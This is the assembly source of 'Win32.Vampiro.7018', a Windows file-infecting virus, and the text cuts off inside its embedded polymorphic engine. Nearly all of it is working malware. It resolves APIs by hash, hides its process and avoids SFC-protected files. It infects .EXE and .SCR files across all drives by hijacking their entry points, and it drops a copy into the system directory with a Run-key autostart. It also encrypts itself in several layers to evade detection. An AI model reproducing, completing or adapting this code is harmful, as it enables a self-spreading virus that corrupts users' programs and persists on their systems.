; Win32.Vampiro.7018 ; ; + UEP ; + POLY ; + RESIDENT ; + SFC Check ; + MAZER FUCKER ALL INFECT ; ; Small period of writing. Only 2 weeks. ; ; Use : ; - [ETMS] v0.36 by b0z0/iKX [bug fixed] ; - Length-Disassembler Engine by Z0mbie ; - aPLib v0.22b by Joergen Ibsen / Jibz ; - Source of Win32.Vampiro by LordDark ; - Win32.Libertine by [SSR] ; - SFC library by GriYo ; ; and thx 2 other peoplz ; ; Ivan ; %OUT Hey man, you can't comiple it!!! %OUT You have already compiled... .err .586 zcall macro api extrn api: proc call api endm CRC32_init equ 0EDB88320h CRC32_num equ 0FFFFFFFFh CRC32_eax macro string db 0B8h CRC32 string endm CRC32 macro string crcReg = CRC32_num irpc _x, ctrlByte = '&_x&' xor (crcReg and 0FFh) crcReg = crcReg shr 8 rept 8 ctrlByte = (ctrlByte shr 1) xor (CRC32_init * (ctrlByte and 1)) endm crcReg = crcReg xor ctrlByte endm dd crcReg endm import_beg macro kernel db '&kernel&',0 endm import_nam macro name CRC32 &name& local b b=0 irpc a, IF b EQ 0 db '&a&' ENDIF b=b+1 endm &name& dd 0 endm import_end macro dd 0 endm MAX_PATH = 260 find_str struc dwFileAttributes dd ? ftCreationTime dq ? ftLastAccessTime dq ? ftLastWriteTime dq ? nFileSizeHigh dd ? nFileSizeLow dd ? dwReserved0 dd ? dwReserved1 dd ? cFileName db MAX_PATH dup (?) cAlternateFileName db 14 dup (?) ends locals __ .model flat .code db ? .data include x.inc start proc call get_delta call set_seh mov esp, [esp.8] jmp exit set_seh: sub eax, eax push 4 ptr fs:[eax] mov 4 ptr fs:[eax], esp lea eax, [ebp.start] mov 4 ptr [ebp.vl_of], eax call GetKernel32 mov 4 ptr [ebp.k32], eax call import push 0 call [ebp.GetModuleHandleA] add eax, 4 ptr [ebp.host32_2] mov 4 ptr [ebp.host32_2], eax lea edx, [ebp.reloc_jmp] sub eax, edx mov 4 ptr [ebp.reloc_jmp+1-5], eax push 0 5 lea eax, [ebp.saved] push eax mov eax, 4 ptr [ebp.host32_2] push eax call [ebp.GetCurrentProcess] push eax call [ebp.WriteProcessMemory] push _vl 0 call [ebp.GlobalAlloc] push eax xchg eax, edi lea esi, [ebp.start] mov ecx, offset packed - start lea eax, [ebp+__exit] push eax lea eax, [edi+__next-start] push eax rep movsb lea eax, [ebp.packed] push edi push eax call _aP_depack_asm ret __next: call get_delta push eax eax esp call [ebp.GetSystemTimeAsFileTime] pop eax pop edx add eax, edx mov [ebp.seed], eax cmp 1 ptr [ebp.is_drop], 1 mov 1 ptr [ebp.is_drop], 0 jz __k lea eax, [ebp.Vampiro] push eax call [ebp.GlobalFindAtomA] movzx eax, ax test eax, eax jnz __x call create_dropper __x: ret __k: lea eax, [ebp.Vampiro] push eax call [ebp.GlobalAddAtomA] call hide push 10000 call [ebp.Sleep] call infect_all lea eax, [ebp.Vampiro] push eax call [ebp.GlobalFindAtomA] movzx esi, ax push 20 pop ecx __delete: push esi call [ebp.GlobalDeleteAtom] test eax, eax loopne __delete ret __exit: call [ebp.GlobalFree] exit: pop 4 ptr fs:[0] pop eax popad popf db 0E9H dd 0 reloc_jmp: endp _aP_depack_asm: push ebp mov ebp, esp pushad push ebp mov esi, [ebp + 8] ; C calling convention mov edi, [ebp + 12] cld mov dl, 80h literal: movsb nexttag: call getbit jnc literal xor ecx, ecx call getbit jnc codepair xor eax, eax call getbit jnc shortmatch mov al, 10h getmorebits: call getbit adc al, al jnc getmorebits jnz domatch_with_inc stosb jmp short nexttag codepair: call getgamma_no_ecx dec ecx loop normalcodepair mov eax,ebp call getgamma jmp short domatch shortmatch: lodsb shr eax, 1 jz donedepacking adc ecx, 2 mov ebp, eax jmp short domatch normalcodepair: xchg eax, ecx dec eax shl eax, 8 lodsb mov ebp, eax call getgamma cmp eax, 32000 jae domatch_with_2inc cmp eax, 1280 jae domatch_with_inc cmp eax, 7fh ja domatch domatch_with_2inc: inc ecx domatch_with_inc: inc ecx domatch: push esi mov esi, edi sub esi, eax rep movsb pop esi jmp short nexttag getbit: add dl, dl jnz stillbitsleft mov dl, [esi] inc esi adc dl, dl stillbitsleft: ret getgamma: xor ecx, ecx getgamma_no_ecx: inc ecx getgammaloop: call getbit adc ecx, ecx call getbit jc getgammaloop ret donedepacking: pop ebp sub edi, [ebp + 12] mov [ebp - 4], edi ; return unpacked length in eax popad pop ebp ret 8 GetKernel32: call __set_seh sub eax, eax mov esp, [esp.8] dec eax jmp __exit __set_seh: sub eax, eax push 4 ptr fs:[eax] mov 4 ptr fs:[eax], esp mov edx, 4 ptr fs:[0]; get first esp fault __3: mov eax, [edx+4] ; offset fault mov edx, [edx] ; next fault ofz sub ax, ax __2: cmp 1 ptr [eax], 'M' jz __1 sub eax, 10000h jmp __2 __1: movzx esi, 2 ptr [eax+3Ch] add esi, eax cmp 1 ptr [esi], 'P' jnz __3 mov esi, [esi+78h] ; no export test esi, esi jz __3 mov esi, [esi+eax+0Ch] cmp 4 ptr [esi+eax], 'NREK' jnz __3 __exit: pop 4 ptr fs:[0] pop edx ret import_table: import_beg kernel32 import_nam _lopen import_nam _lcreat import_nam ReadFile import_nam WriteFile import_nam CloseHandle import_nam CreateProcessA import_nam SetFileAttributesA import_nam GetFileAttributesA import_nam GetFileTime import_nam GetProcAddress import_nam SetFileTime import_nam SetEndOfFile import_nam GetFileSize import_nam GetCurrentProcessId import_nam SetFilePointer import_nam WriteProcessMemory import_nam GetCurrentProcess import_nam GlobalAlloc import_nam GlobalFree import_nam FindClose import_nam FindFirstFileA import_nam FindNextFileA import_nam FreeLibrary import_nam SetCurrentDirectoryA import_nam GetDriveTypeA import_nam GetTempPathA import_nam GetSystemDirectoryA import_nam SetErrorMode import_nam Sleep import_nam GlobalFindAtomA import_nam GlobalAddAtomA import_nam GlobalDeleteAtom import_nam GetSystemTimeAsFileTime import_nam GetCurrentDirectoryA import_nam MultiByteToWideChar import_end import_beg advapi32.dll import_nam RegSetValueExA import_nam RegCreateKeyExA import_nam RegCloseKey import_end import_end get_delta proc call $+5 delta: cld pop ebp sub ebp, offset delta ret endp get_proc proc push ebp ; in: ; eax - CRC32 ; ebx - DLL offset ; dl - first char ; out: ; eax - API address ; [ecx+ebx] - offset API address in table ; ebx - offset DLL movzx edi, 2 ptr [ebx+3Ch] mov edi, [edi+78h+ebx] mov ecx, [edi+18h+ebx] mov esi, [edi+20h+ebx] __1: mov ebp, [esi+ebx] add ebp, ebx cmp 1 ptr [ebp], dl jnz __2 push ebx ecx ; use ebx, ecx ; ebp - offset to name'z xor ebx, ebx dec ebx __5: xor bl, 1 ptr [ebp] inc ebp mov cl, 7 __3: shr ebx, 1 jnc __4 xor ebx, CRC32_init __4: dec cl jns __3 cmp 1 ptr [ebp], 0 jnz __5 cmp eax, ebx pop ecx ebx jz __6 __2: add esi, 4 loop __1 __6: sub ecx, [edi+18h+ebx] neg ecx add ecx, ecx add ecx, [edi+24h+ebx] add ecx, ebx movzx ecx, 2 ptr [ecx] shl ecx, 2 add ecx, [edi+1Ch+ebx] mov eax, [ecx+ebx] add eax, ebx pop ebp ret endp import proc mov ebx, [ebp.k32] CRC32_eax GetModuleHandleA mov dl, 'G' call get_proc mov [ebp.GetModuleHandleA], eax CRC32_eax LoadLibraryA mov dl, 'L' call get_proc mov [ebp.LoadLibraryA], eax lea esi, [ebp.import_table] __1: push esi call [ebp.GetModuleHandleA] test eax, eax jnz __2 ; if library not load ... push esi call [ebp.LoadLibraryA] __2: xchg eax, ebx __3: lodsb test al, al jnz __3 __4: lodsd test eax, eax jz __5 mov dl, [esi] inc esi push esi call get_proc pop edi stosd mov esi, edi jmp __4 __5: cmp [esi], eax jnz __1 ret endp GetModuleHandleA dd 0 LoadLibraryA dd 0 k32 dd 0BFF70000h extra_data: is_drop db 0 saved: ret db 4 dup (90h) host32_2: dd offset host32-00400000h extra_len equ offset $-extra_data vl_sz dd 7016+2 vl_of dd 0 org $-2 db '^^' ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; packed: exec: sub esp, 16 mov ecx, esp sub esp, 64 mov ebx, esp mov 1 ptr [ebx], 64 push ecx ebx 0 0 0 0 0 0 0 eax call [ebp.CreateProcessA] add esp, 16+64 ret host32_1: dd 0 Vampiro equ this byte name_atom db 'Vampiro',0 sfc proc ; call log_it mov esi, edx push 'LLD' push '.CFS' push esp call [ebp.LoadLibraryA] add esp, 8 test eax, eax jz __1 push eax sub esp, 100h+4 push esp 100h+4 call [ebp.GetCurrentDirectoryA] lea edi, [esp+eax] mov al, '\' cmp 1 ptr [edi-1], al jz __2 stosb __2: movsb cmp 1 ptr [esi-1], 0 jnz __2 mov eax, esp sub esp, 200h+8 mov edx, esp push 100h+4 push edx push -1 push eax push 0 push 0 call [ebp.MultiByteToWideChar] call __3 db 'SfcIsFileProtected',0 __3: push 4 ptr [esp+4+200h+100h+4+8] call [ebp.GetProcAddress] test eax, eax jz __4 push esp 0 call eax __4: xchg esi, eax add esp, 200h+100h+8+4 call [ebp.FreeLibrary] xchg esi, eax __1: ret endp key db 'Software\Microsoft\Windows\CurrentVersion\Run',0 create_dropper proc sub esp, 100h mov eax, esp push 100h push eax call [ebp.GetSystemDirectoryA] ; D:\WINDOWS\SYSTEM32 mov 1 ptr [esp+eax], '\' mov 4 ptr [esp+eax+1], '.DDW' mov 4 ptr [esp+eax+5], 'EXE' mov edx, esp call drop_gen cmp eax, -1 jz __3x mov edx, esp mov 1 ptr [ebp.is_drop], 1 call infect_it mov eax, esp call exec mov esi, esp push eax push eax mov edi, esp lea edx, [edi.4] sub eax, eax push edx push edi push eax push 0f003fh push eax push eax push eax lea eax, [ebp+key] push eax push 80000002h call [ebp+RegCreateKeyExA] test eax, eax jnz @@x sub ecx, ecx mov edx, esi __x: mov al, [edx] inc edx inc ecx test al, al jnz __x dec ecx push ecx push esi push 1 push 0 lea eax, [ebp+name_atom] push eax push 4 ptr [edi] call [ebp+RegSetValueExA] push 4 ptr [edi] call [ebp+RegCloseKey] @@x: add esp, 8 jmp __4 __3x: push esp push 100h call [ebp.GetTempPathA] ; C:\WINDOWS\TEMP\ mov 4 ptr [esp+eax], '.DDW' mov 4 ptr [esp+eax+4], 'EXE' mov edx, esp call drop_gen cmp eax, -1 jz __4 mov edx, esp mov 1 ptr [ebp.is_drop], 1 call infect_it mov eax, esp call exec __4:add esp, 100h ret endp infect_all proc push '\:A' __2:push esp call [ebp.GetDriveTypeA] cmp eax, 2 jbe __1 cmp al, 5 jz __1 push esp call [ebp.SetCurrentDirectoryA] mov esi, esp sub esp, ((size find_str) and (not 11b))+4 mov edi, esp call recsearch add esp, ((size find_str) and (not 11b))+4 __1:inc 1 ptr [esp] cmp 1 ptr [esp], 'Z'+1 jnz __2 pop eax ret endp recsearch: push '*.*' mov eax, esp push edi eax call [ebp.FindFirstFileA] pop edx cmp eax, -1 jz __1 xchg eax, ebx __2:mov eax, esi sub eax, esp cmp eax, 0C00h ja __4 test 1 ptr [edi.dwFileAttributes], 10h jz __3 ; JZ - not DIR cmp 1 ptr [edi.cFileName], '.' jz __4 lea eax, [edi.cFileName] push eax call [ebp.SetCurrentDirectoryA] push ebx call recsearch push '..' push esp call [ebp.SetCurrentDirectoryA] pop eax pop ebx jmp __4 __3:pusha lea edx, [edi.cFileName] mov edi, edx push -1 pop ecx sub al, al repne scasb mov eax, [edi-4] and eax, 0DFDFDFDFh cmp eax, 'EXE' and 0DFDFDFDFh ; .EXE jz __7 cmp eax, 'RCS' and 0DFDFDFDFh ; .SCR jnz __6 __7: call infect_it push 2000 call [ebp.Sleep] __6: popa __4: push edi push ebx push 500 call [ebp.Sleep] call [ebp.FindNextFileA] test eax, eax jnz __2 push ebx call [ebp.FindClose] __1:ret hide proc SEM_FAILCRITICALERRORS = 00001h SEM_NOGPFAULTERRORBOX = 00002h SEM_NOALIGNMENTFAULTEXCEPT = 00004h SEM_NOOPENFILEERRORBOX = 08000h push SEM_FAILCRITICALERRORS or SEM_NOGPFAULTERRORBOX or SEM_NOOPENFILEERRORBOX call [ebp.SetErrorMode] call __1 db 'RegisterServiceProcess',0 __1: push 4 ptr [ebp.k32] call [ebp.GetProcAddress] test eax, eax jz __2 xchg eax, ebx call [ebp.GetCurrentProcessId] push 1 push eax call ebx __2: ret endp ; не трогать: ; - _A ; - VI ; - UN ; - SC ; - NO ; - AV infect_it proc call __set_seh mov esp, [esp.8] jmp __1 __set_seh: cld sub eax, eax push 4 ptr fs:[eax] mov 4 ptr fs:[eax], esp mov ax, [edx] and eax, 0DFDFh cmp eax, 'A_' and 0DFDFh jz __1 cmp eax, 'IV' and 0DFDFh jz __1 cmp eax, 'NU' and 0DFDFh jz __1 cmp eax, 'CS' and 0DFDFh jz __1 cmp eax, 'ON' and 0DFDFh jz __1 cmp eax, 'VA' and 0DFDFh jz __1 push edx call sfc ; EAX == 0 -> OK pop edx test eax, eax jnz __1 call infect __1: pop 4 ptr fs:[0] pop eax ret endp infect proc ; edx - name call fattrg cmp eax, -1 jnz __1 __2: ret __1: sub ecx, ecx xchg eax, ecx call fattrs test eax, eax jz __2 push 2 pop eax call open cmp eax, -1 xchg eax, ebx jz __2 push ecx sub esp, 3*8 mov esi, esp push edx call gettime lea edx, [ebp.buffer] push 3Ch+4 pop ecx call read jc __close cmp 2 ptr [edx], 'ZM' jnz __close cmp 2 ptr [edx.18h], 40h jb __close push edx movzx edx, 2 ptr [edx.3Ch] mov [ebp.word3C], edx call seek pop edx mov ecx, 0F8h + (28h*8) call read jc __close cmp 2 ptr [edx], 'EP' jnz __close ; dll ? if i process dll then skip ; this test test 2 ptr [edx.16h], 2000h jnz __close ; can run ? test 2 ptr [edx.16h], 0002h jz __close ; good image base ? cmp 4 ptr [edx.160], 0 jz __yeeah cmp 4 ptr [edx.52], 00400000h jnz __close __yeeah: ; intel x86 processor ? mov al, [edx.4] and al, 11110000b cmp al, 40h jnz __close ; 2..8 sections ? cmp 2 ptr [edx.06h], 8 ja __close cmp 2 ptr [edx.06h], 2 jb __close ; it's already ? test 1 ptr [edx.44h], 16 jnz __close or 1 ptr [edx.44h], 16 ; save EIP mov eax, [edx.28h] mov 4 ptr [ebp.host32_1], eax mov eax, [edx+52] mov [ebp.save_me], eax mov eax, 1000h cmp [edx.38h], eax ja __close cmp [edx.3Ch], eax ja __close lea edi, [ebp.buff] mov ecx, (len_buff)/4 sub eax, eax rep stosd mov 4 ptr [edx.58h], eax call process_it __close: pop edx mov esi, esp call settime add esp, 3*8 call close pop eax call fattrs ret endp process_it proc movzx eax, 2 ptr [edx.14h] cmp al, 0E0h jnz __1 lea edi, [eax+18h+edx] movzx ecx, 2 ptr [edx.6] __loop: ; check file mov esi, [edx.28h] cmp 4 ptr [edi.0Ch], esi ja __4 push eax mov eax, 4 ptr [edi.0Ch] add eax, 4 ptr [edi.10h] cmp esi, eax pop eax jb __5 __4: add edi, 28h loop __loop jmp __1 __5: test 1 ptr [edi.27h], 80h jnz __1 mov esi, [edi.12] add esi, [edi.16] sub esi, [edx.40] mov 4 ptr [ebp.__rule_me], size_UEP-4 cmp esi, size_UEP-4 ja __b sub esi, 4 mov 4 ptr [ebp.__rule_me], esi __b: ; read from IP some bytes ; for UEP lea esi, [eax+18h+edx] push edx mov eax, [edx.028h] sub eax, [edi.0Ch] add eax, [edi.14h] mov 4 ptr [ebp.forUEP], eax xchg eax, edx call seek lea edx, [ebp.UEP] mov ecx, 4 ptr [ebp.__rule_me] add ecx, 4 call read pop edx jc __1 movzx eax, 2 ptr [edx.6] dec eax imul eax, eax, 28h add esi, eax mov edi, [esi.14h] add edi, [esi.10h] call fsize cmp eax, edi jz __2 push edx mov edx, edi call seek push eax eax mov edx, esp push 8 pop ecx call read pop eax pop ecx cmp eax, 1 jnz __not_3 cmp ecx, 1234567h org $-4 db 10h,1,0,0 jz __3 __not_3: and eax, 1234567h org $-4 db 0FFh, 0FFh, 0F0h, 0 cmp eax, 1234567h org $-4 db 'N','B',30h,0 jz __3 call fsize sub eax, edi cmp eax, 100h ; 256 bytes only ; if yes then skip it ;) jb __3 pop eax jmp __1 __3: mov edx, edi call seek call truncate pop edx __2: mov [ebp.flen], edi mov eax, [edx.160] test eax, eax jz __ok mov edi, [esi.12] cmp eax, edi jb __1 add edi, [esi.16] cmp eax, edi ja __1 dec 2 ptr [edx.6] push edx push 28h pop ecx sub eax, eax mov 4 ptr [edx.160], eax mov 4 ptr [edx.164], eax mov edx, [esi.20] mov edi, esi rep stosb call seek mov [ebp.flen], eax call truncate mov edx, [ebp.word3C] call seek lea edx, [ebp.buffer] mov ecx, 0F8h + (28h*8) call write pop edx sub esi, 28h __ok: cmp 4 ptr [esi.1], 'zniw' ; winz jz __1 or 1 ptr [esi.24h+3], 0C0h pusha lea eax, [ebp.tbl] push eax call disasm_init add esp, 4 push 1234567h __rule_me equ 2 ptr $-4 pop ecx lea edi, [ebp.UEP] sub ebx, ebx __find: inc ebx cmp ebx, (size_UEP-4) / 2 ja __error push edi lea eax, [ebp.tbl] push eax call disasm_main add esp, 8 cmp eax, -1 jnz __no_error __error: lea edi, [ebp.UEP] jmp __found __no_error: sub ecx, eax jc __error lea edx, [ebp.UEP] cmp 1 ptr [edi], 0EBh jnz __no_EB movsx eax, 1 ptr [edi.1] push edi inc edi inc edi add edi, eax pop eax cmp edi, edx jb __error add edx, 4 ptr [ebp.__rule_me] cmp edi, edx ja __error push edi xchg eax, edi sub eax, edi sub ecx, eax pop edi jmp __find __no_EB: cmp 1 ptr [edi], 0E9H jz __found mov edx, 4 ptr [ebp.__rule_me] sub edx, 128 cmp ecx, edx ja __no_E8 cmp 1 ptr [edi], 0E8h jz __found __no_E8: add edi, eax jmp __find __found: lea ecx, [ebp.UEP] mov eax, edi sub eax, ecx add eax, 4 ptr [ebp.host32_1] mov 4 ptr [ebp.host32_2], eax mov eax, [edi] mov 4 ptr [ebp.saved], eax mov al, [edi.4] mov 1 ptr [ebp.saved+4], al mov al, 0E9h stosb lea edx, [ebp.UEP] mov eax, edi dec eax sub eax, edx neg eax add eax, 4 ptr [esi.10h] add eax, 4 ptr [esi.0Ch] sub eax, 4 ptr [ebp.host32_1] sub eax, 5 stosd ;;;;;; FUCK lea esi, [ebp.extra_data] push extra_len pop ecx mov edi, [ebp.vl_of] add edi, offset extra_data - start rep movsb ;;;;;; popa pusha mov esi, [ebp.vl_of] lea edi, [ebp.buff+2] mov ecx, [ebp.vl_sz] ; rep movsb call engine_serv ; mov ecx, [ebp.vl_sz] ; lea edi, [ebp.buff+2] mov _EAX, ecx mov _EDI, edi popa dec edi dec edi mov 2 ptr [edi], 609Ch inc eax inc eax xchg eax, edi push eax ; edi - virus length mov eax, edi add eax, [edx.3Ch] add eax, [esi.10h] mov ecx, [edx.3Ch] neg ecx and eax, ecx mov [esi.10h], eax cmp [esi.08h], eax ja __x mov [esi.08h], eax __x: mov eax, [esi.08h] add eax, [esi.0Ch] push eax mov ecx, [edx.38h] neg ecx and eax, ecx cmp eax, 4 ptr [esp] jae __xxx add eax, [edx.38h] __xxx: mov [edx.50h], eax pop eax call fsize xchg eax, edx call seek pop edx db 0BFh flen dd 0 mov ecx, [esi.10h] add ecx, [esi.14h] sub ecx, edi call write mov edx, [ebp.forUEP] call seek lea edx, [ebp.UEP] mov ecx, 4 ptr [ebp.__rule_me] add ecx, 4 call write mov edx, [ebp.word3C] call seek lea edx, [ebp.buffer] mov ecx, 0F8h + (28h*8) call write __1: ret endp truncate proc pushad push ebx call [ebp.SetEndOfFile] jmp n_chk endp fsize proc pushad push 0 ebx call [ebp.GetFileSize] jmp n_chk endp gettime proc pushad ; esi - addres struc ; ; CONST FILETIME * lpftLastWrite // time the file was last written ; CONST FILETIME * lpftLastAccess, // time the file was last accessed ; CONST FILETIME * lpftCreation, // time the file was created ; ; filetime struc ; dwLowDateTime dd ? ; dwHighDateTime dd ? ; ends push esi lodsd lodsd push esi lodsd lodsd push esi ebx call [ebp.GetFileTime] jmp n_chk endp settime proc pushad ; esi - addres struc ; ; CONST FILETIME * lpftLastWrite // time the file was last written ; CONST FILETIME * lpftLastAccess, // time the file was last accessed ; CONST FILETIME * lpftCreation, // time the file was created ; ; filetime struc ; dwLowDateTime dd ? ; dwHighDateTime dd ? ; ends push esi lodsd lodsd push esi lodsd lodsd push esi ebx call [ebp.SetFileTime] jmp n_chk endp fattrs proc pushad push eax edx call [ebp.SetFileAttributesA] jmp n_chk endp fattrg proc pushad push edx call [ebp.GetFileAttributesA] jmp n_chk endp open proc pushad ; eax - mode ; edx - name ; ; OF_READ Opens the file for reading only. ; OF_READWRITE Opens the file for reading and writing. ; OF_WRITE Opens the file for writing only. push eax edx call [ebp._lopen] n_chk: mov [esp.1Ch], eax popad ret endp close proc pushad push ebx call [ebp.CloseHandle] popad ret endp write proc pushad push eax mov eax, esp push 0 push eax push ecx edx ebx call [ebp.WriteFile] jmp n_check endp read proc ; ecx - length ; ebx - handle ; edx - buffer pushad push eax mov eax, esp push 0 push eax push ecx edx ebx call [ebp.ReadFile] n_check: pop eax mov [esp.1Ch], eax popad cmp eax, ecx jz __1 stc __1: ret endp seek proc pushad push 0 0 edx ebx call [ebp.SetFilePointer] jmp n_chk endp _EAX EQU 4 PTR [ESP+7*4] _ECX EQU 4 PTR [ESP+6*4] _EDX EQU 4 PTR [ESP+5*4] _EBX EQU 4 PTR [ESP+4*4] _ESP EQU 4 PTR [ESP+3*4] _EBP EQU 4 PTR [ESP+2*4] _ESI EQU 4 PTR [ESP+1*4] _EDI EQU 4 PTR [ESP+0*4] save_me dd 0 engine_serv: push edx ecx mov eax, [ebp.seed] mov ecx, 714024+1 sub edx, edx div ecx mov [ebp.seed], edx pop ecx edx mov eax, _EBP pusha mov eax, 25*1024 add eax, [ebp.vl_sz] push eax 0 call [ebp.GlobalAlloc] mov _EDX, eax popa push edx ebp mov ebp, [ebp.save_me] add ebp, 4 ptr [eax.10h] add ebp, 4 ptr [eax.0Ch] inc ebp inc ebp call engine pop ebp pusha push 4 ptr [esp+8*4] call [ebp.GlobalFree] popa pop edx ret engine: ; ; - expressway to my skull - ; - [ETMS] v0.36 - ; - b0z0/iKX - ; ; This is a polymorphic engine for Win32/Win9X viruses. It should be fully ; compatible with any 486+ processor. You should check ver. 0.1 (Xine#4) ; for some more basic informations. ; ; Changes from v0.1: ; - Multiple layers of encryption (random from 2 to 7 layers) ; - New garbage types added (MOVSX, MOVZX, BT family, SET family, ; XADD, SHLD/SHRD, CMPXCHG, BSWAP, XLAT, ENTER/LEAVE) on regs, ; mem, flags (when possible). Direct read/write on stack using ; ESP + offset. ; - Antiemulation structures (code emulation checks, stack consistency ; checks, stack segment play, memory consistency on writes) ; - New ways of incrementing/decrementing pointer/counter, changing ; encryption key, initializing registers and exiting from loop. ; - Some minor parts have been rewritten ; ; Using the poly: ; Just add the ETMS source in your virus, simply: ; include etms.asm ; Set the registers as described below and then call the poly. The poly uses ; some data for internal purposes. This data of course is not needed to be ; carried around with your infected file or whatever. You can just include ; the ETMS source at the end of the file and then skip the bytes that start ; from the label _mem_data_start. Of course you'll need to have that free ; memory placed there at runtime. ; The random seed (the dd at seed) should be initialized at first poly ; run to a value between 0 and 714024. ; ; Calling parameters: ; ECX = Lenght of things to be encrypted ; ESI = Pointer to what we want to encrypt ; EDI = Where to place decryptor and encrypted stuff ; EBP = Offset at which decryptor will run ; EDX = Some free temporary place for the poly ; The two needed space zones (EDI and EDX) should be at least 25kb plus ; the lenght of your code. Just allocate some mem, you're in Windoze baby! ; ; On exit: ; EDI = Pointer to generated code ; ECX = Lenght of generated code (decryptor + encrypted code) ; ; Contacts: ; Email me at cl0wn@geocities.com or query me on irc. ; ; Special greetings: ; I'd like to specially thank StarZero/iKX for the great support and for ; convincing me to write this. Greetings also to pigpen/s0ftpj for persistent ; support irl, crazyness roxor! ;), and also greets to claire for making me ; feel like i tought i could never feel ; ; Misc greetings to: ; The entire iKX and S0ftpj crew and: kernel panic, darkman, gigabyte, ; jackie-, rucker, talena, benny, inty13, uselessa, reptile, dandler, fusys, ; jhb, slagehammer, giorgetto, tankie, griyo and gf, vecna, belfa, del0, ; wintermute, spanska, sepultura, cavallo, milla, ^syren^, claire. ; ; - live fast, die young - ; - written in aug/sept 2000 - ; engine: cld push edi push edi call poly_delta poly_delta: pop eax ; where we are running sub eax,offset poly_delta push ecx push eax lea ebx,[offset v_runnin + eax] o_vrun equ offset v_runnin ; save some bytes since off between ; various data is a 8b mov dword ptr [ebx],ebp mov dword ptr [ebx - (o_vrun - offset orig_dx)],edx mov dword ptr [ebx - (o_vrun - offset layer_nr)],tl_space xor ecx,ecx bit_loop: inc ecx shl ebp,1 jnc bit_loop ; find higher bit with an 1 dec ecx ; for random memory offsets mov byte ptr [ebx - (o_vrun - offset t_memand)],cl pop ebp ; delta how_manylayers: call get_random_al7 ; random number of layers cmp al,6 ; from 2 to 7 jae how_manylayers mov ecx,l_space mul ecx mov dword ptr [ebx - (o_vrun - offset layer_end)],eax pop ecx start_layer: o_tini equ offset r_pointer lea ebx,[offset r_pointer + ebp] ; dest, cnt and source mov dword ptr [ebx - (o_tini - offset t_inipnt)],edi mov dword ptr [ebx - (o_tini - offset v_lenght)],ecx mov dword ptr [ebx - (o_tini - offset v_virusp)],esi mov dword ptr [ebx - (o_tini - offset r_pointer)],010ffffffh mov dword ptr [ebx - (o_tini - offset t_chgpnt)],01000404h xor eax,eax mov dword ptr [ebx - (o_tini - offset t_fromend)],eax mov dword ptr [ebx - (o_tini - offset t_pntoff)],eax mov dword ptr [ebx - (o_tini - offset t_cntoff)],eax mov dword ptr [ebx - (o_tini - offset w_loopbg)],eax mov dword ptr [ebx - (o_tini - offset t_inacall)-2],eax inc al mov dword ptr [ebx - (o_tini - offset t_exitjmp)],eax push edi ; initialize layer data mov ecx,[ebx - (o_tini - offset layer_nr)] lea edi,[ebx - (o_tini - offset enc_space) + ecx + 10h] ; init layers encryptor, regs struct no needed mov al,90h ; virgin encryptor mov dword ptr [ebx - (o_tini - offset w_encrypt)],edi mov ecx,enc_max rep stosb pop edi call rnd_garbage mov ecx,3 mov esi,ebx ; to memory structures mov edx,dword ptr [esi - (o_tini - offset layer_nr)] ; edx has offset in the layer structure init_part: push ecx select_register: call get_register ; get a unused register xchg ebx,ecx select_block: call get_random_al7 and al,011b jz select_block ; select from 01 to 03 dec eax cmp byte ptr [eax+esi],0ffh ; check if that stage already jne select_block ; done mov byte ptr [eax+esi],bl ; save the register for that ; stage or al,al jnz not_pointer mov dword ptr [esi - (offset r_pointer - offset enc_space) + edx + 12],edi ; save offset where the jmp assign_next ; pointer is initialized not_pointer: dec eax jnz not_counter mov dword ptr [esi - (offset r_pointer - offset w_counter)],edi jmp assign_next ; assign inital counter not_counter: call get_random ; get key mov dword ptr [esi - (offset r_pointer - offset enc_space) + edx],eax xchg eax,ecx ; save key for encryptor call get_random and al,1 jz assign_next ; if so use key mov byte ptr [esi+2],20h ; don't use key, just imm jmp next_loop assign_next: ; BL register ; ECX value ; either with mov reg, imm or via stack call get_random shr al,1 jnc do_withmov mov al,068h ; push immediate stosb xchg eax,ecx stosd call rnd_garbage mov al,bl add al,058h ; pop reg32 base stosb jmp next_loop do_withmov: mov eax,ebx ; in bl register or al,0b8h ; mov base stosb xchg eax,ecx stosd ; the value next_loop: mov al,bl call set_used ; mark as unusable so far call rnd_garbage pop ecx loop init_part ; make all init steps ; now some base assignment to a pointer, counter and key (if used) registers ; has been done. here we are gonna change a bit the various registers where ; the various things has been assigned call get_random_al7 and al,011b ; from 0 to 3 moves, could be 0-7 ? jz decryptor_build_start xchg eax,ecx reg_movida: push ecx get_whichone: call select_save ; select which to change (pnt,cnt,key) jc leave_this_out call save_mov_xchg ; change the regs using mov or xchg mov byte ptr [edx],al leave_this_out: pop ecx loop reg_movida decryptor_build_start: ; decryptor loop begins right here lea esi,[offset t_chgpnt + ebp] mov dword ptr [esi - (offset t_chgpnt - offset w_loopbg)],edi call get_random ; select if starting from head or from and ax,0101h ; tail and if counter will dec or inc mov word ptr [esi - (offset t_chgpnt - offset t_fromend)],ax xchg eax,edx ; rnd in edx shl edx,1 ; add a constant to counter? jnc normal_counter call get_random mov dword ptr [esi - (offset t_chgpnt - offset t_cntoff)],eax normal_counter: cmp byte ptr [esi - (offset t_chgpnt - offset r_pointer)],05h ; no bp + off je reget_size_op shl edx,1 ; select if use only pointer or jc reget_size_op ; pointer + offset call get_random ; select random offset mov dword ptr [esi - (offset t_chgpnt - offset t_pntoff)],eax ; if using get offset reget_size_op: call get_random mov edx,eax and eax,0fh ; select math operation and size or eax,eax ; of operand jz reget_size_op ; byte word dword ; ror 1 6 b ; sub 2 7 c ; xor 3 8 d ; add 4 9 e ; rol 5 a f ; no_rorrrpr: cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],03 ; if not ax,cx,dx,bx then can't be byte jb can_use_all ; as key cmp al,6 ; is byte? get another jb reget_size_op can_use_all: xor ecx,ecx mov cl,10 ;9 cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],20h je no_keychanges shr edx,8 ; edx has rnd and edx,011b mov byte ptr [esi - (offset t_chgpnt - offset t_chgkey)],dl add ecx,edx ; add nr of key changes no_keychanges: cmp al,0bh jae ok_counts sub ecx,4d ; if with words 4 inc/dec less sub word ptr [esi],0202h cmp al,06d jae ok_counts dec ecx ; for bytes even less dec ecx sub word ptr [esi],0101h ok_counts: push eax call rnd_garbage get_nextseq: call get_random_al7 cmp al,4 ja get_nextseq xchg eax,edx cmp byte ptr [esi+edx],0 ; need more ? je get_nextseq dec byte ptr [esi+edx] shl edx,2 